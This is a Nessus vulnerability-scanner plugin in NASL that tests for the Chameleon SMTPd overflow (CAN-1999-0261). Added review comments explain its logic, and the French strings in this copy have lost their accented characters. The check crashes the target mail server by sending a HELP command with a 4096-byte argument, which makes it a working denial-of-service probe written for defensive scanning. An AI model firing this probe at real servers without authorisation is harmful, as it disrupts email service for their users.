File: chameleon_smtpd_overflow.nasl

nessus-plugins 1.0.10-2
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
#
# See the Nessus Scripts License for details
#

# Registration pass: when `description` is true the script only declares
# its metadata (id, CVE reference, report text, category, dependencies)
# and exits through the exit(0) at the end of this block, before any
# traffic is sent to the target.
if(description)
{
 # Plugin id and the CVE candidate entry this check is filed under.
 script_id(10042);
 script_cve_id("CAN-1999-0261");
 name["english"] = "Chameleon SMTPd overflow";
 name["francais"] = "Chameleon SMTPd overflow";
 script_name(english:name["english"],
 	     francais:name["francais"]);
 
 # Report text shown when the check fires. The finding is reported as a
 # crash (loss of mail service), not as code execution.
 desc["english"] = "It was possible to
crash the remote SMTP server by issuing
the HELP command followed by a too long
argument.

This problem may allow crackers to
prevent you from sending or receiving
e-mails, thus preventing you to
work properly.


Solution : Update your SMTP server.

Risk factor : Medium";


 # NOTE(review): the French strings below appear to have lost their
 # accented characters in this copy ("avr", "problme", "drangeant",
 # "Dni"); restore them from the upstream file rather than guessing.
 desc["francais"] = "Il s'est avr
possible de planter le daemon SMTP 
distant en lui envoyant la commande
HELP suivie d'un argument trop long.

Un pirate peut utiliser ce problme 
pour vous empecher de recevoir
et d'envoyer des emails, vous
drangeant ainsi dans votre travail.

Solution : Mettez  jour votre server SMTP.

Facteur de risque : Moyen";


 script_description(english:desc["english"],
 		    francais:desc["francais"]);
 
 summary["english"] = "Determines if smtpd can be crashed"; 
 summary["francais"] = "Fait planter smtpd";
 script_summary(english:summary["english"],
 		francais:summary["francais"]);
 
 # ACT_DENIAL: the check works by trying to crash the service, so a
 # positive result means the target's SMTP daemon has stopped accepting
 # connections.
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 
 family["english"] = "Denial of Service"; 
 family["francais"] = "Dni de service";
 
 script_family(english:family["english"],
 	       francais:family["francais"]);
 # Runs after service discovery and sendmail_expn.nasl. The plugin is
 # excluded when the knowledge base holds "Sendmail/fake" -- presumably
 # set by a dependency when the listener is not a genuine SMTP server;
 # confirm against sendmail_expn.nasl.
 script_dependencie("find_service.nes", "sendmail_expn.nasl");
 script_exclude_keys("Sendmail/fake");
 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

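# Active check: send one HELP command with an over-long argument, then
# test whether the SMTP listener still accepts TCP connections. A failed
# reconnect is reported as the finding.
#
# The verdict rests only on "port no longer accepts connections", so it
# is only meaningful if the service was answering beforehand. The
# original read the greeting banner but never looked at it; a listener
# that was already unhealthy or refusing this host could then be reported
# as crashed by the test. The banner is now required as a baseline.

# Skip listeners the knowledge base has flagged as "Sendmail/fake".
fake = get_kb_item("Sendmail/fake");
if(fake)exit(0);

# Use the SMTP port recorded in the knowledge base, else the default.
port = get_kb_item("Services/smtp");
if(!port)port = 25;

if(!get_port_state(port))exit(0);

soc = open_sock_tcp(port);
if(!soc)exit(0);

# Baseline: no greeting line means the service was not answering before
# the test, so nothing can be concluded from a later connection failure.
banner = recv_line(socket:soc, length:1024);
if(!banner)
{
 close(soc);
 exit(0);
}

probe = string("HELP ", crap(4096), "\r\n");
send(socket:soc, data:probe);
close(soc);

# Verdict: the listener answered before the probe and refuses a new
# connection after it. A single refused connect can also come from
# connection limits or filtering, so confirm a positive result against
# the mail server's own logs before treating it as a crash.
soc2 = open_sock_tcp(port);
if(!soc2)security_hole(port);
else close(soc2);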